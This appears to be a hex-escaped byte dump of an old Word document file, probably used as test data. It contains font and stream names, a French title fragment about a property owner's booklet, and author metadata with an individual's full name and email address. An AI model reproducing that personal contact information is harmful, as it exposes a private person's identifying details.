-"\x00\x00\x68\x6e\x00\x00\x6d\x6e\x00\x00\x79\x6e\x00\x00\x88\x6e" -"\x00\x00\x90\x6e\x00\x00\x94\x6e\x00\x00\x95\x6e\x00\x00\x98\x6e" -"\x00\x00\x9e\x6e\x00\x00\xa9\x6e\x00\x00\xb8\x6e\x00\x00\xc4\x6e" -"\x00\x00\xc9\x6e\x00\x00\xca\x6e\x00\x00\xcd\x6e\x00\x00\xd2\x6e" -"\x00\x00\xdd\x6e\x00\x00\xec\x6e\x00\x00\xf5\x6e\x00\x00\x03\x6f" -"\x00\x00\x04\x6f\x00\x00\x07\x6f\x00\x00\x0b\x6f\x00\x00\x15\x6f" -"\x00\x00\x24\x6f\x00\x00\x2e\x6f\x00\x00\x3c\x6f\x00\x00\x3d\x6f" -"\x00\x00\xbb\x6f\x00\x00\xb1\x73\x00\x00\x1b\x74\x00\x00\x00\x00" -"\x00\x00\x35\x00\x00\x00\x01\x00\x00\x00\x35\x00\x00\x00\x21\x86" -"\x02\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" 
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" -"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" -"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" -"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" -"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" 
-"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" -"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" -"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" -"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x6e\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" -"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" 
-"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" -"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x96\x01" -"\x00\x04\x21\x86\x02\x30\x00\x00\x00\x00\xff\x40\x01\x80\x01\x00" -"\x7d\x71\x00\x00\x7d\x71\x00\x00\x18\x30\x22\x02\x01\x00\x01\x00" -"\x7d\x71\x00\x00\x00\x00\x00\x00\x7d\x71\x00\x00\x00\x00\x00\x00" -"\x02\x10\x00\x00\x00\x00\x00\x00\x00\x1a\x74\x00\x00\x70\x00\x00" -"\x10\x00\x40\x00\x00\xff\xff\x01\x00\x00\x00\x07\x00\x55\x00\x6e" -"\x00\x6b\x00\x6e\x00\x6f\x00\x77\x00\x6e\x00\xff\xff\x01\x00\x08" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x01\x00\x00" -"\x00\x00\x00\xff\xff\x00\x00\x02\x00\xff\xff\x00\x00\x00\x00\xff" -"\xff\x00\x00\x02\x00\xff\xff\x00\x00\x00\x00\x04\x00\x00\x00\x47" -"\x16\x90\x01\x00\x00\x02\x02\x06\x03\x05\x04\x05\x02\x03\x04\x87" -"\x7a\x00\x20\x00\x00\x00\x80\x08\x00\x00\x00\x00\x00\x00\x00\xff" -"\x01\x00\x00\x00\x00\x00\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x73" -"\x00\x20\x00\x4e\x00\x65\x00\x77\x00\x20\x00\x52\x00\x6f\x00\x6d" -"\x00\x61\x00\x6e\x00\x00\x00\x35\x16\x90\x01\x02\x00\x05\x05\x01" -"\x02\x01\x07\x06\x02\x05\x07\x00\x00\x00\x00\x00\x00\x00\x10\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x53" -"\x00\x79\x00\x6d\x00\x62\x00\x6f\x00\x6c\x00\x00\x00\x33\x26\x90" -"\x01\x00\x00\x02\x0b\x06\x04\x02\x02\x02\x02\x02\x04\x87\x7a\x00" -"\x20\x00\x00\x00\x80\x08\x00\x00\x00\x00\x00\x00\x00\xff\x01\x00" -"\x00\x00\x00\x00\x00\x41\x00\x72\x00\x69\x00\x61\x00\x6c\x00\x00" -"\x00\x3b\x06\x90\x01\x86\x07\x02\x01\x06\x00\x03\x01\x01\x01\x01" -"\x01\x03\x00\x00\x00\x00\x00\x0e\x08\x10\x00\x00\x00\x00\x00\x00" -"\x00\x01\x00\x04\x00\x00\x00\x00\x00\x53\x00\x69\x00\x6d\x00\x53" -"\x00\x75\x00\x6e\x00\x00\x00\x8b\x5b\x53\x4f\x00\x00\x22\x00\x04" -"\x00\x71\x08\x88\x18\x00\xf0\xc5\x02\x00\x00\xa9\x01\x00\x00\x00" 
-"\x00\x33\x8d\xa1\x46\x21\x95\xa1\x66\x71\x1d\x82\x46\x04\x00\x02" -"\x00\x00\x00\xd3\x11\x00\x00\x0c\x62\x00\x00\x01\x00\x3b\x00\x00" -"\x00\x04\x00\x83\x10\xd1\x00\x00\x00\xd3\x11\x00\x00\x0c\x62\x00" -"\x00\x01\x00\x3b\x00\x00\x00\xd1\x00\x00\x00\x00\x00\x00\x00\x21" -"\x03\x00\xf0\x10\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa5\x06\xc0" -"\x07\xb4\x00\xb4\x00\x80\x00\x32\x34\x00\x00\x10\x00\x19\x00\x64" -"\x00\x00\x00\x19\x00\x00\x00\xa4\x73\x00\x00\xa4\x73\x00\x00\x00" -"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x01\x33\x83\x51\x00\xf0\x10\x04\xdf\xdf\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x00\x00" -"\x00\x28\xf0\xff\x0f\x01\x00\x01\x3f\x00\x00\xe4\x04\x00\x00\xff" -"\xff\xff\x7f\xff\xff\xff\x7f\xff\xff\xff\x7f\xff\xff\xff\x7f\xff" -"\xff\xff\x7f\xff\xff\xff\x7f\xff\xff\xff\x7f\xae\x0f\x6a\x00\xff" -"\xff\x12\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x4c\x00\x45\x00\x20" -"\x00\x4c\x00\x49\x00\x56\x00\x52\x00\x45\x00\x54\x00\x20\x00\x44" -"\x00\x55\x00\x20\x00\x50\x00\x52\x00\x4f\x00\x50\x00\x52\x00\x49" -"\x00\x45\x00\x54\x00\x41\x00\x49\x00\x52\x00\x45\x00\x20\x00\x44" -"\x00\x45\x00\x00\x00\x00\x00\x00\x00\x03\x00\x2a\x00\x2a\x00\x2a" -"\x00\x03\x00\x50\x00\x61\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00" -"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x16\x00\x05\x01\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x00\x00" -"\x06\x09\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x9f\xde\x2d" 
-"\x61\x5a\xc6\x01\xe1\x00\x00\x00\x80\x05\x00\x00\x00\x00\x00\x00" -"\x44\x00\x61\x00\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x0a\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x82\x00\x00\x00\x2c\x22\x00\x00\x00\x00\x00\x00" -"\x31\x00\x54\x00\x61\x00\x62\x00\x6c\x00\x65\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x0e\x00\x02\x01\x01\x00\x00\x00\x06\x00\x00\x00\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x94\x00\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00" -"\x57\x00\x6f\x00\x72\x00\x64\x00\x44\x00\x6f\x00\x63\x00\x75\x00" -"\x6d\x00\x65\x00\x6e\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x1a\x00\x02\x01\x02\x00\x00\x00\x05\x00\x00\x00\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x29\x02\x01\xb4\x00\x00\x00\x00" -"\x81\x00\x00\x00\xfe\xff\xff\xff\x83\x00\x00\x00\x84\x00\x00\x00" -"\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00\x88\x00\x00\x00" -"\x89\x00\x00\x00\x8a\x00\x00\x00\x8b\x00\x00\x00\x8c\x00\x00\x00" -"\x8d\x00\x00\x00\x8e\x00\x00\x00\x8f\x00\x00\x00\x90\x00\x00\x00" 
-"\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\xfe\xff\xff\xff" -"\x95\x00\x00\x00\x96\x00\x00\x00\x97\x00\x00\x00\x98\x00\x00\x00" -"\x99\x00\x00\x00\x9a\x00\x00\x00\x9b\x00\x00\x00\x9c\x00\x00\x00" -"\x9d\x00\x00\x00\x9e\x00\x00\x00\x9f\x00\x00\x00\xa0\x00\x00\x00" -"\xa1\x00\x00\x00\xa2\x00\x00\x00\xa3\x00\x00\x00\xa4\x00\x00\x00" -"\xa5\x00\x00\x00\xa6\x00\x00\x00\xa7\x00\x00\x00\xa8\x00\x00\x00" -"\xa9\x00\x00\x00\xaa\x00\x00\x00\xab\x00\x00\x00\xac\x00\x00\x00" -"\xad\x00\x00\x00\xae\x00\x00\x00\xaf\x00\x00\x00\xb0\x00\x00\x00" -"\xb1\x00\x00\x00\xb2\x00\x00\x00\xb3\x00\x00\x00\xb4\x00\x00\x00" -"\xb5\x00\x00\x00\xb6\x00\x00\x00\xb7\x00\x00\x00\xb8\x00\x00\x00" -"\xb9\x00\x00\x00\xba\x00\x00\x00\xbb\x00\x00\x00\xbc\x00\x00\x00" -"\xbd\x00\x00\x00\xbe\x00\x00\x00\xbf\x00\x00\x00\xc0\x00\x00\x00" -"\xc1\x00\x00\x00\xc2\x00\x00\x00\xc3\x00\x00\x00\xc4\x00\x00\x00" -"\xc5\x00\x00\x00\xc6\x00\x00\x00\xc7\x00\x00\x00\xc8\x00\x00\x00" -"\xc9\x00\x00\x00\xca\x00\x00\x00\xcb\x00\x00\x00\xfe\xff\xff\xff" -"\xd0\x00\x00\x00\xfd\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff" -"\xfe\xff\xff\xff\xcf\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xd1\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x01\x00\x00\x00\xfe\xff\xff\xff\x03\x00\x00\x00\x04\x00\x00\x00" 
-"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00" -"\xfe\xff\xff\xff\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00" -"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00" -"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00" -"\x15\x00\x00\x00\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x03\x00\x00\x00\x0e\x00\x00\x00\x5f\x00\x45\x00\x6d\x00\x61\x00" -"\x69\x00\x6c\x00\x53\x00\x75\x00\x62\x00\x6a\x00\x65\x00\x63\x00" -"\x74\x00\x00\x00\x04\x00\x00\x00\x0d\x00\x00\x00\x5f\x00\x41\x00" -"\x75\x00\x74\x00\x68\x00\x6f\x00\x72\x00\x45\x00\x6d\x00\x61\x00" -"\x69\x00\x6c\x00\x00\x00\x00\x00\x05\x00\x00\x00\x18\x00\x00\x00" -"\x5f\x00\x41\x00\x75\x00\x74\x00\x68\x00\x6f\x00\x72\x00\x45\x00" -"\x6d\x00\x61\x00\x69\x00\x6c\x00\x44\x00\x69\x00\x73\x00\x70\x00" -"\x6c\x00\x61\x00\x79\x00\x4e\x00\x61\x00\x6d\x00\x65\x00\x00\x00" -"\x02\x00\x00\x00\xb0\x04\x00\x00\x13\x00\x00\x00\x0c\x04\x00\x00" -"\x03\x00\x00\x00\x0c\xcb\xf4\x5d\x1f\x00\x00\x00\x2f\x00\x00\x00" -"\x6d\x00\x69\x00\x73\x00\x65\x00\x20\x00\x20\x00\x6a\x00\x6f\x00" -"\x75\x00\x72\x00\x20\x00\x72\x00\xe9\x00\x67\x00\x6c\x00\x65\x00" -"\x6d\x00\x65\x00\x6e\x00\x74\x00\x73\x00\x20\x00\x2b\x00\x20\x00" -"\x66\x00\x65\x00\x75\x00\x69\x00\x6c\x00\x6c\x00\x65\x00\x20\x00" -"\x65\x00\x6e\x00\x67\x00\x61\x00\x67\x00\x65\x00\x6d\x00\x65\x00" -"\x6e\x00\x74\x00\x20\x00\x45\x00\x4e\x00\x43\x00\x00\x00\x00\x00" -"\x1f\x00\x00\x00\x1a\x00\x00\x00\x70\x00\x69\x00\x63\x00\x61\x00" -"\x72\x00\x64\x00\x65\x00\x6e\x00\x40\x00\x63\x00\x6c\x00\x75\x00" -"\x62\x00\x2d\x00\x69\x00\x6e\x00\x74\x00\x65\x00\x72\x00\x6e\x00" -"\x65\x00\x74\x00\x2e\x00\x66\x00\x72\x00\x00\x00\x1f\x00\x00\x00" -"\x10\x00\x00\x00\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00" -"\x69\x00\x61\x00\x20\x00\x4d\x00\x4f\x00\x4e\x00\x49\x00\x4f\x00" -"\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00" -"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00" -"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x28\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x02\x00\x00\x00\xb0\x01\x00\x00\x00\x00\x00\x00" 